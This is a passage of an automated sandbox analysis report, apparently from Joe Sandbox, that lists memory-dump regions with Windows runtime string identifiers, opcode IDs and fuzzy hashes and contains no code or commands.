                                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 0185A309
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                    • API String ID: 0-2876891731
                                                                                    • Opcode ID: ffe22be809efc493659d93b8e52df08571f4900994a81716cd02a7b92786c837
                                                                                    • Instruction ID: f7403c51287b02ecd26c2584388f9675ae578aa5d2161b70d111e970c61a58e5
                                                                                    • Opcode Fuzzy Hash: ffe22be809efc493659d93b8e52df08571f4900994a81716cd02a7b92786c837
                                                                                    • Instruction Fuzzy Hash: 4B41CF31A00649DBDB19CF5DC880BA9BBB5FF85308F1441A5EE04DB352E675DB40CB51
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: Cleanup Group$Threadpool!
                                                                                    • API String ID: 2994545307-4008356553
                                                                                    • Opcode ID: e612e68e31344162f76037a8c98dca7b39cd9f5bc6c0f0aaba44e8771d9dfb17
                                                                                    • Instruction ID: 99e7c86bcfad19845dd73094bf4623a95c744a13c40c1a3bf6b57ebb4b3cd9b5
                                                                                    • Opcode Fuzzy Hash: e612e68e31344162f76037a8c98dca7b39cd9f5bc6c0f0aaba44e8771d9dfb17
                                                                                    • Instruction Fuzzy Hash: 7C01F4B2295704AFD321EF14CD45F2677E8E785B29F04893AE648C71D4E334EA04CB4A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: MUI
                                                                                    • API String ID: 0-1339004836
                                                                                    • Opcode ID: 711e4d9ca52d60622c75a81ca5aee2e30520fb470598ff5cab2eb1b5f863a333
                                                                                    • Instruction ID: f060b486eeb4c22b1fc53eaa727c2d4b637f25695e69cf16f9878586d1e3b712
                                                                                    • Opcode Fuzzy Hash: 711e4d9ca52d60622c75a81ca5aee2e30520fb470598ff5cab2eb1b5f863a333
                                                                                    • Instruction Fuzzy Hash: 22826875E002198BEBA5CFA9C880BEDBBB5FF48354F148169ED19EB251D7309A81CF50
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3916222277
                                                                                    • Opcode ID: a0da85a188d46c64d16ba4c09233edd1e0648919f8e0b78efa66927a56ef2d70
                                                                                    • Instruction ID: 82268e679a7a2fbac2bd42c9757926295c2bb418f3f2fb718de70b9e33b499e3
                                                                                    • Opcode Fuzzy Hash: a0da85a188d46c64d16ba4c09233edd1e0648919f8e0b78efa66927a56ef2d70
                                                                                    • Instruction Fuzzy Hash: 56916371940219AFDB21DB99CD85FAEBBB8EF14B50F200065F600EB191E774EE00CB61
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: GlobalTags
                                                                                    • API String ID: 0-1106856819
                                                                                    • Opcode ID: 90585f2d18ccdda4a8112ffc7eba70f74a3bd330fa2ddaff47077ac9cf11e3cd
                                                                                    • Instruction ID: ef92a4abb6859229d3f6816dd9f096194a98da7e832aba86c531471e428c945e
                                                                                    • Opcode Fuzzy Hash: 90585f2d18ccdda4a8112ffc7eba70f74a3bd330fa2ddaff47077ac9cf11e3cd
                                                                                    • Instruction Fuzzy Hash: 31714BB5E0020A9BDB28DF9CC590AAEBBB1BF48B14F24853EE505E7345E735DA41CB50
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .mui
                                                                                    • API String ID: 0-1199573805
                                                                                    • Opcode ID: 925ab48bf75c4dabb9e03002d429d28b36a8c2699db3629b1445fcb24d374a73
                                                                                    • Instruction ID: beec6fb807586da1e3fa056466ada5a6fd411c639f69a9c7ebdda01c7ad93a18
                                                                                    • Opcode Fuzzy Hash: 925ab48bf75c4dabb9e03002d429d28b36a8c2699db3629b1445fcb24d374a73
                                                                                    • Instruction Fuzzy Hash: 57518E72D0022A9BDF11DF99D840AAFBBB4AF44B14F05412EEB12FB255D7349A05CBA4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: EXT-
                                                                                    • API String ID: 0-1948896318
                                                                                    • Opcode ID: 76009d15f3ffada3a3694e1d2ac38760dca7e6814add36678e66b32a9f88fc16
                                                                                    • Instruction ID: 6090355a069ce5237fce143edad4dc142115343d31ca83d89adb6c330919e8d0
                                                                                    • Opcode Fuzzy Hash: 76009d15f3ffada3a3694e1d2ac38760dca7e6814add36678e66b32a9f88fc16
                                                                                    • Instruction Fuzzy Hash: 6341A3765183129BD711DA79C880B6BBBECAF88714F04092DFA84D7140E778DB04C797
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: AlternateCodePage
                                                                                    • API String ID: 0-3889302423
                                                                                    • Opcode ID: fbf819b604f6f8c3beb5edc2db53cabd0af23cef99cfd2fba508d2b4bc632e14
                                                                                    • Instruction ID: 45a87291b193af9849aeaa556d9516e9f6a132352f8b3f64050bf1924be6c6b3
                                                                                    • Opcode Fuzzy Hash: fbf819b604f6f8c3beb5edc2db53cabd0af23cef99cfd2fba508d2b4bc632e14
                                                                                    • Instruction Fuzzy Hash: 1041D172D01209ABEF29DB9CCC80AEEBBB8FF44310F54415AE512E3650D7709B81CB95
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: BinaryHash
                                                                                    • API String ID: 0-2202222882
                                                                                    • Opcode ID: 0fb78614664126f9fea877db187d07b84a220838640b8f1e9fe4c0c3a0d50194
                                                                                    • Instruction ID: c4d8f032d0cf43eca45139b9f70b56000d6fa0a4bbf81a94647b451748003adc
                                                                                    • Opcode Fuzzy Hash: 0fb78614664126f9fea877db187d07b84a220838640b8f1e9fe4c0c3a0d50194
                                                                                    • Instruction Fuzzy Hash: A84141B2D0112DAADF21DA54CC84FDFB77CEB45714F0045A9EA08EB140DB309F898BA5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: #
                                                                                    • API String ID: 0-1885708031
                                                                                    • Opcode ID: c36b4835ec94bd0536e4d42c71113a07c3d8266858d83a921939846cb74ce704
                                                                                    • Instruction ID: aa892c06ef0882f492d9fa7f63f4d5ef49af51f48879952106c1c94df8706e60
                                                                                    • Opcode Fuzzy Hash: c36b4835ec94bd0536e4d42c71113a07c3d8266858d83a921939846cb74ce704
                                                                                    • Instruction Fuzzy Hash: 1D312C31A007099BEB22CB6DC858BAE7BE8DF66704F244068E941DB282E775DA15CB50
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: BinaryName
                                                                                    • API String ID: 0-215506332
                                                                                    • Opcode ID: b9f6fd8b17e7b9d29c0f47a0e391a2b64216faa407d647bebaeb332ad7bb838f
                                                                                    • Instruction ID: acfef3ee653b90e6a9305c56226f91fbd1b5e31d78f479255717b710d76d7060
                                                                                    • Opcode Fuzzy Hash: b9f6fd8b17e7b9d29c0f47a0e391a2b64216faa407d647bebaeb332ad7bb838f
                                                                                    • Instruction Fuzzy Hash: B4310376900519AFEB15DA9CC845E6FBBB4EB80B20F01416DE909E7251D730DF04EBE0
                                                                                    Strings
                                                                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 018D895E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                    • API String ID: 0-702105204
                                                                                    • Opcode ID: 2da186fe681b6a99a19699f6cd0ff444c8cc6fb947ca02ce8da98bdb0c294807
                                                                                    • Instruction ID: 9aaaebeabf763f14f3824066f82aedee17ca56b20587d7a17118847e90cae55b
                                                                                    • Opcode Fuzzy Hash: 2da186fe681b6a99a19699f6cd0ff444c8cc6fb947ca02ce8da98bdb0c294807
                                                                                    • Instruction Fuzzy Hash: B101F236200305BBEB306FAA8C84E5A7B65EF87364F05002DF68196556CF20AE41C793
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d85012e54692f34934e44b1f0444ab5a844de8f7a9d31503f33add29826ef10b
                                                                                    • Instruction ID: ac83dd329933a3c2401a3794040e9b34bf6c832630d92a6403cfc7bf335036b7
                                                                                    • Opcode Fuzzy Hash: d85012e54692f34934e44b1f0444ab5a844de8f7a9d31503f33add29826ef10b
                                                                                    • Instruction Fuzzy Hash: F842E1766083419BE725CF68C890A6BBBE6FF88304F48092DFB82D7250D770DA45CB52
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4e1a2989f4585ff3dbd87c59d6eee85416888be613c1640759c7725d3d4cc313
                                                                                    • Instruction ID: 94702dc9572d31cdd7b10fd93d8132f13b4a6f8dd623aee203fe449eeee4fc70
                                                                                    • Opcode Fuzzy Hash: 4e1a2989f4585ff3dbd87c59d6eee85416888be613c1640759c7725d3d4cc313
                                                                                    • Instruction Fuzzy Hash: FE426D75E002198FEB25CF69C885BADBBF5BF4A304F148099E949EB242D7349A81CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 37e933afa7be48e1066a7dd62648958c2f8cb2c11ed3d54f15c0450b1bb13ce8
                                                                                    • Instruction ID: bfcdca315188c4aed7cb01c6cc9b00c519d70be7693d10d8fe3c83ef2facfba1
                                                                                    • Opcode Fuzzy Hash: 37e933afa7be48e1066a7dd62648958c2f8cb2c11ed3d54f15c0450b1bb13ce8
                                                                                    • Instruction Fuzzy Hash: 4332CE70A0075A8BEB25CF69C884BFEBBF2BF85704F244119D54ADB385E735AA41CB50
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9bc9ab26353f51ae105fa2db942ca0d54f94ae5e9175b99a427e34be219e4505
                                                                                    • Instruction ID: 96e99184b003452d2b44dd337f2a95a873efda07444c8a529607ee8908a65f77
                                                                                    • Opcode Fuzzy Hash: 9bc9ab26353f51ae105fa2db942ca0d54f94ae5e9175b99a427e34be219e4505
                                                                                    • Instruction Fuzzy Hash: 2B22C0742046658BEB29CF2DC094772BBF1AF44364F18845DEB8ACB286D335E652CB60
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 182d49017bfbc19849f42c1d2b10ce96a7bf1fb126d032333718fa4e0420bbf3
                                                                                    • Instruction ID: 3eafae277fc86116c938a5836e963026f06b29f50a3f638649242284eb7c7b1b
                                                                                    • Opcode Fuzzy Hash: 182d49017bfbc19849f42c1d2b10ce96a7bf1fb126d032333718fa4e0420bbf3
                                                                                    • Instruction Fuzzy Hash: E771F432200701AFEB329F18C888F5ABBE6EF51764F244418E655C72A1E775EA44CB50
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0dc816957460b6d45a1346d1c0710512b9b1023621a82b20b315c7c0efe34741
                                                                                    • Instruction ID: 5da96a7f33544b9c7de85c6b3a6276f6d1d2e6c7c737ba19d95ec2eac5a40b68
                                                                                    • Opcode Fuzzy Hash: 0dc816957460b6d45a1346d1c0710512b9b1023621a82b20b315c7c0efe34741
                                                                                    • Instruction Fuzzy Hash: 9181AA72A083068FDB25CF99C484BAEBBB6EB49314F15416AD900EB391D734AE40CB91
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dfca30a351adc0200134bafb60cd61d0ffda29296c079233ceb86bdeb5a78a48
                                                                                    • Instruction ID: e43efe8c59d8b07bb59240141ed820f78d52f7510dae33a773d448831d6eeddd
                                                                                    • Opcode Fuzzy Hash: dfca30a351adc0200134bafb60cd61d0ffda29296c079233ceb86bdeb5a78a48
                                                                                    • Instruction Fuzzy Hash: EF61C071A4020ADFCB19EF6CC880AAEB7B5FF09714F14416DE616EB295DB31DA01CB61
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 79be3c883fb746ffc50c40577375ae9e1ae04a0b82ca01ecf72a0ca37e98b905
                                                                                    • Instruction ID: ed033124e2a11ee620e0836088fe7e3243de2708788e7814005bbf536b7c6fec
                                                                                    • Opcode Fuzzy Hash: 79be3c883fb746ffc50c40577375ae9e1ae04a0b82ca01ecf72a0ca37e98b905
                                                                                    • Instruction Fuzzy Hash: E2519DB26007459FDB30EF5DC8C4A6AB7A9FB54709F100DAEE106CBA51C774EA84CB91
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
                                                                                    • Instruction ID: 70512856dc26b7444d596158c41ac0c2b45feb84aaf4a1fa9a53ded933e5c36c
                                                                                    • Opcode Fuzzy Hash: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
                                                                                    • Instruction Fuzzy Hash: 69514976E1060A9FCB14CFACC9D06EEBBB1FB48314F198569D915EB300D734AB418B94
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3a55216d426ee267d8d4c7032f0adbc89067a69046db8239d5cc93121c6942b4
                                                                                    • Instruction ID: 9ed5733436a859cb5efc8375c01248e0feeb82f02d59762fc93d5686483ad681
                                                                                    • Opcode Fuzzy Hash: 3a55216d426ee267d8d4c7032f0adbc89067a69046db8239d5cc93121c6942b4
                                                                                    • Instruction Fuzzy Hash: 6C51D37260470A9FD711DF28C840BAAB7E9FF94351F04492CFD8997294D734E988CB96
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ef8e06da8cd99831ad6d1610370e3aec0bff84567248a33dcfcdb0e818b36305
                                                                                    • Instruction ID: ca383378a0a74cbd14b9ed79fb19d9796db4ef95cb069fa652d7ab8e8c1b5841
                                                                                    • Opcode Fuzzy Hash: ef8e06da8cd99831ad6d1610370e3aec0bff84567248a33dcfcdb0e818b36305
                                                                                    • Instruction Fuzzy Hash: AA51CF70900709EFDB21DF5AC880A6BFBF8BFA6714F10461EE256D76A1C770A645CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 954512bab9000f68f641d4ee4fdaab9f0dbc366008f0c306c4d90d3c1cdd7048
                                                                                    • Instruction ID: 348bec387cfc4e6137195e9f135437a297c842c341529e76faa38f763924441b
                                                                                    • Opcode Fuzzy Hash: 954512bab9000f68f641d4ee4fdaab9f0dbc366008f0c306c4d90d3c1cdd7048
                                                                                    • Instruction Fuzzy Hash: 44515A71600A05EFCB22EF69C980E6AB3FDFF58754F40046AEA55D7660D734EA40CB61
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dcf6facce0cc5d4eb63af2730f5b9ab8151fe7952a39c1607878e886af079758
                                                                                    • Instruction ID: 1bdbec3a29a94c0aaa70137e5e08833e17f5c2e96ac8626d262a111bbddc3eff
                                                                                    • Opcode Fuzzy Hash: dcf6facce0cc5d4eb63af2730f5b9ab8151fe7952a39c1607878e886af079758
                                                                                    • Instruction Fuzzy Hash: 495133716083469FD754DF29C881A6BBBE5FBC8308F44492EF699C7250EB30DA05CB92
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                    • Instruction ID: f1159d40728619fe55dfb2c0bcd020025afb443d6ae5e124508fe73f8818ac40
                                                                                    • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                    • Instruction Fuzzy Hash: 8C515C71E0421EABDF15DF98C480BEEBBB9AF45794F144069EA01EB240D734DE44CBA5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                    • Instruction ID: 560da327946224c5c658904c0344877689346b32a1a52fda6f1b6654846ba518
                                                                                    • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                    • Instruction Fuzzy Hash: 64517571D0071EEFEF219E98C894BAEBB75AB00368F154665D912FB190D730AF44CBA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6a44c953d903bce561ef92c2d3d5e22f1f37e765c07745c2f0428823d7c569bf
                                                                                    • Instruction ID: 17d251fd1ff8ec8a802b078a4d9107f342d47cf3dbc79daab12987c146dd2dbe
                                                                                    • Opcode Fuzzy Hash: 6a44c953d903bce561ef92c2d3d5e22f1f37e765c07745c2f0428823d7c569bf
                                                                                    • Instruction Fuzzy Hash: 29411770B416099BE729DB2DC890F3BBB9EFFD1261F048118F95D87288D734D881D691
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3522720e87299b95bee22e3f12a3b857cb8ddd602403749ebb5c0a4de0c792d6
                                                                                    • Instruction ID: ebfc95d3db7e56f7271f59ea706523bb7438f1ee66dfdbbd6188fcd4adeb30d2
                                                                                    • Opcode Fuzzy Hash: 3522720e87299b95bee22e3f12a3b857cb8ddd602403749ebb5c0a4de0c792d6
                                                                                    • Instruction Fuzzy Hash: 1C518BB6A0031ADFCB20DFADC980DAEBBB9FB49358B214519D605E3305D730AA01CB91
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3e2f7a5425351e2b06b2be2fe3dec833ce135914251b1d23777b441d51633806
                                                                                    • Instruction ID: 45e208577227ed4b941d2dc056b3a9a802eaa1705c5821e764bba06092b069da
                                                                                    • Opcode Fuzzy Hash: 3e2f7a5425351e2b06b2be2fe3dec833ce135914251b1d23777b441d51633806
                                                                                    • Instruction Fuzzy Hash: B64113756442069BDF39FFACA8C0F6A3765AB59718F00003DF902DB386EB71DA108761
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                    • Instruction ID: b3fb0063ec03ebff9e9f8009c0dc04a30d1fc9b3f0ca19f1ff2b63078780fc51
                                                                                    • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                    • Instruction Fuzzy Hash: A9412B3260174A9FD725CF68C984A6BB7AEFF90311B04462EE91A87248EB30FD54C7D0
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: de4cee08cf91c571d39005ae84cd261eb53aab4fd3518f4209842949b8218407
                                                                                    • Instruction ID: d3af064a0059d562dbcfe1ae4d67233101c21a475bfcec558eb558ca7acc89cc
                                                                                    • Opcode Fuzzy Hash: de4cee08cf91c571d39005ae84cd261eb53aab4fd3518f4209842949b8218407
                                                                                    • Instruction Fuzzy Hash: FA41DD3690021ADBDB11EF98C440AEEBBB4BF48704F14826AF919F7240D7359E49CBA5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9d63d8d2d75e66fedf879bc0c8bc556e85adfb9ede08627468efb794fbbbd4fb
                                                                                    • Instruction ID: 825cc19a38450656fcdc3252ae78981453f998f9c43e327880dd52aa16cbdbc7
                                                                                    • Opcode Fuzzy Hash: 9d63d8d2d75e66fedf879bc0c8bc556e85adfb9ede08627468efb794fbbbd4fb
                                                                                    • Instruction Fuzzy Hash: BE41D4B52143058FD720DF2CC884A67B7EAFF88318F0449AAE656C7711DB34EA448B51
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
